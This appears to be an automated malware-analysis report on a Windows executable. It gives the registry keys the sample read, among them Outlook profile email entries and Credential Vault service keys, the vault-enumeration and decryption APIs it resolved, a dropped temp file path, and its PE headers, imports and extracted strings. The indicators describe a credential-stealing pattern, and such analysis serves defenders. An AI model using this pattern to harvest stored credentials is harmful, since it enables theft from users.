HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
\xe8\xab\x90\xc8\x92EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
lpk.dll.LpkEditControl
kernel32.dll.GetDiskFreeSpaceExA
oleaut32.dll.VariantChangeTypeEx
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarAdd
oleaut32.dll.VarSub
oleaut32.dll.VarMul
oleaut32.dll.VarDiv
oleaut32.dll.VarIdiv
oleaut32.dll.VarMod
oleaut32.dll.VarAnd
oleaut32.dll.VarOr
oleaut32.dll.VarXor
oleaut32.dll.VarCmp
oleaut32.dll.VarI4FromStr
oleaut32.dll.VarR4FromStr
oleaut32.dll.VarR8FromStr
oleaut32.dll.VarDateFromStr
oleaut32.dll.VarCyFromStr
oleaut32.dll.VarBoolFromStr
oleaut32.dll.VarBstrFromCy
oleaut32.dll.VarBstrFromDate
oleaut32.dll.VarBstrFromBool
user32.dll.GetMonitorInfoA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayMonitors
user32.dll.AnimateWindow
comctl32.dll.InitializeFlatSB
comctl32.dll.UninitializeFlatSB
comctl32.dll.FlatSB_GetScrollProp
comctl32.dll.FlatSB_SetScrollProp
comctl32.dll.FlatSB_EnableScrollBar
comctl32.dll.FlatSB_ShowScrollBar
comctl32.dll.FlatSB_GetScrollRange
comctl32.dll.FlatSB_GetScrollInfo
comctl32.dll.FlatSB_GetScrollPos
comctl32.dll.FlatSB_SetScrollPos
comctl32.dll.FlatSB_SetScrollInfo
comctl32.dll.FlatSB_SetScrollRange
user32.dll.SetLayeredWindowAttributes
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
sechost.dll.LookupAccountSidLocalW
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
"C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe"
C:\Windows\system32\lsass.exe
56BC56B24CFE6F2024462707
VaultSvc

PE Information

Image Base 0x00400000
Entry Point 0x0047d348
Reported Checksum 0x00000000
Actual Checksum 0x000b19c3
Minimum OS Version 4.0
Compile Time 1991-12-10 04:36:50
Import Hash 1bf3dfb307ebfa8bd4824f38b5f9c06c

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
CODE 0x00001000 0x0007c390 0x0007c400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.60
DATA 0x0007e000 0x0000139c 0x00001400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.10
BSS 0x00080000 0x00000c05 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.idata 0x00081000 0x00002468 0x00002600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.91
.tls 0x00084000 0x00000010 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rdata 0x00085000 0x00000018 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 0.21
.reloc 0x00086000 0x0000873c 0x00008800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.63
.rsrc 0x0008f000 0x00024a24 0x00024c00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 7.09

Imports

Library kernel32.dll:
0x481164 VirtualFree
0x481168 VirtualAlloc
0x48116c LocalFree
0x481170 LocalAlloc
0x481174 GetVersion
0x481178 GetCurrentThreadId
0x481184 VirtualQuery
0x481188 WideCharToMultiByte
0x48118c MultiByteToWideChar
0x481190 lstrlenA
0x481194 lstrcpynA
0x481198 LoadLibraryExA
0x48119c GetThreadLocale
0x4811a0 GetStartupInfoA
0x4811a4 GetProcAddress
0x4811a8 GetModuleHandleA
0x4811ac GetModuleFileNameA
0x4811b0 GetLocaleInfoA
0x4811b4 GetCommandLineA
0x4811b8 FreeLibrary
0x4811bc FindFirstFileA
0x4811c0 FindClose
0x4811c4 ExitProcess
0x4811c8 WriteFile
0x4811d0 RtlUnwind
0x4811d4 RaiseException
0x4811d8 GetStdHandle
Library user32.dll:
0x4811e0 GetKeyboardType
0x4811e4 LoadStringA
0x4811e8 MessageBoxA
0x4811ec CharNextA
Library advapi32.dll:
0x4811f4 RegQueryValueExA
0x4811f8 RegOpenKeyExA
0x4811fc RegCloseKey
Library oleaut32.dll:
0x481204 SysFreeString
0x481208 SysReAllocStringLen
0x48120c SysAllocStringLen
Library kernel32.dll:
0x481214 TlsSetValue
0x481218 TlsGetValue
0x48121c LocalAlloc
0x481220 GetModuleHandleA
Library advapi32.dll:
0x481228 RegQueryValueExA
0x48122c RegOpenKeyExA
0x481230 RegCloseKey
Library kernel32.dll:
0x481238 lstrcpyA
0x48123c lstrcmpA
0x481240 WriteFile
0x481244 WaitForSingleObject
0x481248 VirtualQuery
0x48124c VirtualProtect
0x481250 VirtualAlloc
0x481254 SleepEx
0x481258 Sleep
0x48125c SizeofResource
0x481260 SetThreadLocale
0x481264 SetFilePointer
0x481268 SetEvent
0x48126c SetErrorMode
0x481270 SetEndOfFile
0x481274 ResetEvent
0x481278 ReadFile
0x48127c MulDiv
0x481280 LockResource
0x481284 LoadResource
0x481288 LoadLibraryA
0x481294 GlobalUnlock
0x481298 GlobalReAlloc
0x48129c GlobalHandle
0x4812a0 GlobalLock
0x4812a4 GlobalFree
0x4812a8 GlobalFindAtomA
0x4812ac GlobalDeleteAtom
0x4812b0 GlobalAlloc
0x4812b4 GlobalAddAtomA
0x4812b8 GetVersionExA
0x4812bc GetVersion
0x4812c0 GetTickCount
0x4812c4 GetThreadLocale
0x4812c8 GetSystemInfo
0x4812cc GetStringTypeExA
0x4812d0 GetStdHandle
0x4812d4 GetProcAddress
0x4812d8 GetModuleHandleA
0x4812dc GetModuleFileNameA
0x4812e0 GetLocaleInfoA
0x4812e4 GetLocalTime
0x4812e8 GetLastError
0x4812ec GetFullPathNameA
0x4812f0 GetFileAttributesA
0x4812f4 GetDiskFreeSpaceA
0x4812f8 GetDateFormatA
0x4812fc GetCurrentThreadId
0x481300 GetCurrentProcessId
0x481304 GetCPInfo
0x481308 GetACP
0x48130c FreeResource
0x481310 InterlockedExchange
0x481314 FreeLibrary
0x481318 FormatMessageA
0x48131c FindResourceA
0x481320 FindFirstFileA
0x481324 FindClose
0x481330 EnumCalendarInfoA
0x48133c CreateThread
0x481340 CreateFileA
0x481344 CreateEventA
0x481348 CompareStringA
0x48134c CloseHandle
Library version.dll:
0x481354 VerQueryValueA
0x48135c GetFileVersionInfoA
Library gdi32.dll:
0x481364 UnrealizeObject
0x481368 StretchBlt
0x48136c SetWindowOrgEx
0x481370 SetWindowExtEx
0x481374 SetWinMetaFileBits
0x481378 SetViewportOrgEx
0x48137c SetViewportExtEx
0x481380 SetTextColor
0x481384 SetStretchBltMode
0x481388 SetROP2
0x48138c SetPixel
0x481390 SetMapMode
0x481394 SetEnhMetaFileBits
0x481398 SetDIBColorTable
0x48139c SetBrushOrgEx
0x4813a0 SetBkMode
0x4813a4 SetBkColor
0x4813a8 SelectPalette
0x4813ac SelectObject
0x4813b0 SelectClipRgn
0x4813b4 SaveDC
0x4813b8 RestoreDC
0x4813bc Rectangle
0x4813c0 RectVisible
0x4813c4 RealizePalette
0x4813c8 Polyline
0x4813cc Polygon
0x4813d0 PolyPolyline
0x4813d4 PlayEnhMetaFile
0x4813d8 PatBlt
0x4813dc MoveToEx
0x4813e0 MaskBlt
0x4813e4 LineTo
0x4813e8 IntersectClipRect
0x4813ec GetWindowOrgEx
0x4813f0 GetWinMetaFileBits
0x4813f4 GetTextMetricsA
0x481400 GetStockObject
0x481404 GetPixel
0x481408 GetPaletteEntries
0x48140c GetObjectA
0x481418 GetEnhMetaFileBits
0x48141c GetDeviceCaps
0x481420 GetDIBits
0x481424 GetDIBColorTable
0x481428 GetDCOrgEx
0x481430 GetClipBox
0x481434 GetBrushOrgEx
0x481438 GetBitmapBits
0x48143c ExtTextOutA
0x481440 ExtCreatePen
0x481444 ExcludeClipRect
0x481448 DeleteObject
0x48144c DeleteEnhMetaFile
0x481450 DeleteDC
0x481454 CreateSolidBrush
0x481458 CreatePenIndirect
0x48145c CreatePalette
0x481464 CreateFontIndirectA
0x481468 CreateDIBitmap
0x48146c CreateDIBSection
0x481470 CreateCompatibleDC
0x481478 CreateBrushIndirect
0x48147c CreateBitmap
0x481480 CopyEnhMetaFileA
0x481484 BitBlt
Library user32.dll:
0x48148c CreateWindowExA
0x481490 WindowFromPoint
0x481494 WinHelpA
0x481498 WaitMessage
0x48149c ValidateRect
0x4814a0 UpdateWindow
0x4814a4 UnregisterClassA
0x4814a8 UnionRect
0x4814ac UnhookWindowsHookEx
0x4814b0 TranslateMessage
0x4814b8 TrackPopupMenu
0x4814c0 ShowWindow
0x4814c4 ShowScrollBar
0x4814c8 ShowOwnedPopups
0x4814cc ShowCursor
0x4814d0 SetWindowsHookExA
0x4814d4 SetWindowTextA
0x4814d8 SetWindowPos
0x4814dc SetWindowPlacement
0x4814e0 SetWindowLongA
0x4814e4 SetTimer
0x4814e8 SetScrollRange
0x4814ec SetScrollPos
0x4814f0 SetScrollInfo
0x4814f4 SetRect
0x4814f8 SetPropA
0x4814fc SetParent
0x481500 SetMenuItemInfoA
0x481504 SetMenu
0x481508 SetKeyboardState
0x48150c SetForegroundWindow
0x481510 SetFocus
0x481514 SetCursor
0x481518 SetClipboardData
0x48151c SetClassLongA
0x481520 SetCapture
0x481524 SetActiveWindow
0x481528 SendMessageA
0x48152c ScrollWindowEx
0x481530 ScrollWindow
0x481534 ScreenToClient
0x481538 RemovePropA
0x48153c RemoveMenu
0x481540 ReleaseDC
0x481544 ReleaseCapture
0x481550 RegisterClassA
0x481554 RedrawWindow
0x481558 PtInRect
0x48155c PostQuitMessage
0x481560 PostMessageA
0x481564 PeekMessageA
0x481568 OpenClipboard
0x48156c OffsetRect
0x481570 OemToCharA
0x481574 MessageBoxA
0x481578 MessageBeep
0x48157c MapWindowPoints
0x481580 MapVirtualKeyA
0x481584 LoadStringA
0x481588 LoadKeyboardLayoutA
0x48158c LoadIconA
0x481590 LoadCursorA
0x481594 LoadBitmapA
0x481598 KillTimer
0x48159c IsZoomed
0x4815a0 IsWindowVisible
0x4815a4 IsWindowEnabled
0x4815a8 IsWindow
0x4815ac IsRectEmpty
0x4815b0 IsIconic
0x4815b4 IsDialogMessageA
0x4815b8 IsChild
0x4815bc IsCharAlphaNumericA
0x4815c0 IsCharAlphaA
0x4815c4 InvalidateRect
0x4815c8 IntersectRect
0x4815cc InsertMenuItemA
0x4815d0 InsertMenuA
0x4815d4 InflateRect
0x4815dc GetWindowTextA
0x4815e0 GetWindowRect
0x4815e4 GetWindowPlacement
0x4815e8 GetWindowLongA
0x4815ec GetWindowDC
0x4815f0 GetTopWindow
0x4815f4 GetSystemMetrics
0x4815f8 GetSystemMenu
0x4815fc GetSysColorBrush
0x481600 GetSysColor
0x481604 GetSubMenu
0x481608 GetScrollRange
0x48160c GetScrollPos
0x481610 GetScrollInfo
0x481614 GetPropA
0x481618 GetParent
0x48161c GetWindow
0x481620 GetMessageTime
0x481624 GetMenuStringA
0x481628 GetMenuState
0x48162c GetMenuItemInfoA
0x481630 GetMenuItemID
0x481634 GetMenuItemCount
0x481638 GetMenu
0x48163c GetLastActivePopup
0x481640 GetKeyboardState
0x481648 GetKeyboardLayout
0x48164c GetKeyState
0x481650 GetKeyNameTextA
0x481654 GetIconInfo
0x481658 GetForegroundWindow
0x48165c GetFocus
0x481660 GetDoubleClickTime
0x481664 GetDlgItem
0x481668 GetDesktopWindow
0x48166c GetDCEx
0x481670 GetDC
0x481674 GetCursorPos
0x481678 GetCursor
0x48167c GetClipboardData
0x481680 GetClientRect
0x481684 GetClassNameA
0x481688 GetClassInfoA
0x48168c GetCaretPos
0x481690 GetCapture
0x481694 GetActiveWindow
0x481698 FrameRect
0x48169c FindWindowA
0x4816a0 FillRect
0x4816a4 EqualRect
0x4816a8 EnumWindows
0x4816ac EnumThreadWindows
0x4816b4 EndPaint
0x4816b8 EnableWindow
0x4816bc EnableScrollBar
0x4816c0 EnableMenuItem
0x4816c4 EmptyClipboard
0x4816c8 DrawTextA
0x4816cc DrawMenuBar
0x4816d0 DrawIconEx
0x4816d4 DrawIcon
0x4816d8 DrawFrameControl
0x4816dc DrawFocusRect
0x4816e0 DrawEdge
0x4816e4 DispatchMessageA
0x4816e8 DestroyWindow
0x4816ec DestroyMenu
0x4816f0 DestroyIcon
0x4816f4 DestroyCursor
0x4816f8 DeleteMenu
0x4816fc DefWindowProcA
0x481700 DefMDIChildProcA
0x481704 DefFrameProcA
0x481708 CreatePopupMenu
0x48170c CreateMenu
0x481710 CreateIcon
0x481714 CloseClipboard
0x481718 ClientToScreen
0x48171c CheckMenuItem
0x481720 CallWindowProcA
0x481724 CallNextHookEx
0x481728 BeginPaint
0x48172c CharNextA
0x481730 CharLowerBuffA
0x481734 CharLowerA
0x481738 CharUpperBuffA
0x48173c CharToOemA
0x481740 AdjustWindowRectEx
Library kernel32.dll:
0x48174c Sleep
Library oleaut32.dll:
0x481754 SafeArrayPtrOfIndex
0x481758 SafeArrayGetUBound
0x48175c SafeArrayGetLBound
0x481760 SafeArrayCreate
0x481764 VariantChangeType
0x481768 VariantCopy
0x48176c VariantClear
0x481770 VariantInit
Library ole32.dll:
0x481778 CoTaskMemAlloc
0x48177c CoCreateInstance
0x481780 CoUninitialize
0x481784 CoInitialize
Library comctl32.dll:
0x481794 ImageList_Write
0x481798 ImageList_Read
0x4817a8 ImageList_DragMove
0x4817ac ImageList_DragLeave
0x4817b0 ImageList_DragEnter
0x4817b4 ImageList_EndDrag
0x4817b8 ImageList_BeginDrag
0x4817bc ImageList_Remove
0x4817c0 ImageList_DrawEx
0x4817c4 ImageList_Replace
0x4817c8 ImageList_Draw
0x4817d8 ImageList_Add
0x4817e0 ImageList_Destroy
0x4817e4 ImageList_Create
0x4817e8 InitCommonControls
Library comdlg32.dll:
0x4817f0 GetOpenFileNameA
Library kernel32.dll:
0x4817f8 MulDiv

`DATA
.idata
.rdata
P.reloc
P.rsrc
System
IInterface
Uhd"@
Uh-0@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
Uh|2@
PhD8@
Phz:@
Uhb;@
kernel32.dll
GetLongPathNameA
Uh)R@
Software\Borland\Locales
Software\Borland\Delphi\Locales
Uh(U@
Magellan MSWHEEL
MouseZ
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
Uh1k@
Uhik@
Uhyn@
ExceptionPo@
EInOutError`p@
ERangeError r@
False
AM/PM
D$LPj
WUWSj
m/d/yy
mmmm d, yyyy
AMPM
AMPM
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarOr
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
Variants
Empty
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Error
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
Int64
String
Array
ByRef
False
TNotifyEvent
TObject
EFOpenError
Classes
Classes
Classes
Classes
Classes
Classes
Classes
TCustomMemoryStream<"A
EThread(&A
TComponentName<&A
TComponentd'A
TBasicActionD)A
Classes
UhL5A
Uh16A
UhO7A
Uh.<A
UhT>A
UhiFA
Uh-HA
%s[%d]
UhVKA
UhhQA
PhX\A
Strings
Uh|SA
UhdTA
UhBTA
UhtVA
UhKWA
UhaYA
UhDYA
UhLZA
Uh'ZA
UhH\A
Uh+\A
UhPgA
Owner
UhUrA
Uh#xA
UhKzA
Uh~}A
UhL~A
False
%s_%d
ulj@h
TPUtilWindow
Graphics
TProgressEvent
TObject
TProgressStage
String
Graphics
Graphics
Graphics
Graphics
TIcon
Graphics
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clRed
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
Default
E$PVSj
%s%s (*.%s)|*.%2:s
%s*.%s
%s (%s)|%1:s|%s
Graphics
Uh? B
Uhn(B
Uhx%B
UhP,B
Uh(0B
F0H-B
Uha<B
Uh4<B
Uh~;B
D$*Ph
UhFHB
\$4Vj
Uh5LB
Uh'MB
comctl32.dll
InitCommonControlsEx
UhgVB
GetMonitorInfoA
GetSystemMetrics
MonitorFromRect
MonitorFromWindow
MonitorFromPoint
>(r[j
GetMonitorInfo
DISPLAY
>(r[j
GetMonitorInfoA
DISPLAY
>(r[j
GetMonitorInfoW
DISPLAY
EnumDisplayMonitors
USER32.DLL
UhU]B
UhueB
UhkkB
UhOmB
comctl32.dll
InitializeFlatSB
UninitializeFlatSB
FlatSB_GetScrollProp
FlatSB_SetScrollProp
FlatSB_EnableScrollBar
FlatSB_ShowScrollBar
FlatSB_GetScrollRange
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_SetScrollPos
FlatSB_SetScrollInfo
FlatSB_SetScrollRange
UhWtB
uxtheme.dll
OpenThemeData
CloseThemeData
DrawThemeBackground
DrawThemeText
GetThemeBackgroundContentRect
GetThemePartSize
GetThemeTextExtent
GetThemeTextMetrics
GetThemeBackgroundRegion
HitTestThemeBackground
DrawThemeEdge
DrawThemeIcon
IsThemePartDefined
IsThemeBackgroundPartiallyTransparent
GetThemeColor
GetThemeMetric
GetThemeString
GetThemeBool
GetThemeInt
GetThemeEnumValue
GetThemePosition
GetThemeFont
GetThemeRect
GetThemeMargins
GetThemeIntList
GetThemePropertyOrigin
SetWindowTheme
GetThemeFilename
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysBool
GetThemeSysSize
GetThemeSysFont
GetThemeSysString
GetThemeSysInt
IsThemeActive
IsAppThemed
GetWindowTheme
EnableThemeDialogTexture
IsThemeDialogTextureEnabled
GetThemeAppProperties
SetThemeAppProperties
GetCurrentThemeName
GetThemeDocumentationProperty
DrawThemeParentBackground
EnableTheming
Uh4|B
Uh)}B
Uha}B
Uh9~B
Uhy~B
TIncludeItemEvent
Boolean
FileEditStyle
Cancel
Abort
Retry
Ignore
NoToAll
YesToAll
commdlg_help
commdlg_FindReplace
WndProcPtr%.8X%.8X
Anchors
AutoSize
DragMode
Enabled
IncrementalDisplay
Picturep.E
PopupMenu
Proportional
ShowHint
Stretch
Transparent
ExtCtrls
ExtCtrls7
Anchors
Constraints
Ctl3D
UseDockManager
DragMode
Enabled
Locked
ParentBiDiMode
ParentBackground
ParentColor
ParentCtl3D
ParentFont
ParentShowHintp.E
PopupMenu
TabOrder
TabStop
TabOrder
ExtCtrls%
Color
Pages
ParentColor
ParentCtl3D
ParentFont
ParentShowHintp.E
PopupMenu
TabOrder
TabStop
TSectionEvent
TObject
Integer
Integer
Align
Constraints
ParentFont
ParentShowHintp.E
Sections
TabOrder
TabStop
ExtCtrls
ExtCtrls
Sections
Clipbrd
Delphi Picture
Delphi Component
Action
GroupIndex
Caption
Enabled
NumGlyphs
ParentFont
ParentShowHint
ParentBiDiModep.E
PopupMenu
Spacing
Transparent
Buttons
ExtDlgs
PicturePanel
PictureLabel
PreviewButton
PREVIEWGLYPH
PaintPanel
PaintBox
DLGTEMPLATE
PreviewForm
Panel
Image
MAPI32.DLL
TGetItemCountEvent
Integer
TItemSelectedEvent
TControl
ListActns
TGetVirtualItemEvent
Pointer
Caption
ItemIndex
SecondaryShortCuts
TGetItemEvent
TListControlItem
ListActns
Caption
ItemIndexL"C
Items
SecondaryShortCuts
Visible\!C
Uh-+C
Uhy,C
Uh#5C
TCustomTabControl$7C
ComCtrls
ComCtrls
THotKey8;C
THotKeyd:C
Anchors
Constraints
Modifiers
ParentBiDiMode
ParentShowHintp.E
PopupMenu
TabOrder
TabStop
ComCtrls
ComCtrls
ComCtrlstBC
ComCtrls
TComboBoxExhEC
ComCtrls3
AutoCompleteOptionsP@C
StylepBC
Constraints
DragMode
MaxLength
ParentBiDiMode
ParentColor
ParentCtl3D
ParentFont
ParentShowHintp.E
PopupMenu
TabOrder
comctl32.dll
TTabStringsHPC
ComCtrls
UhxRC
Uh4SC
SysTabControl32
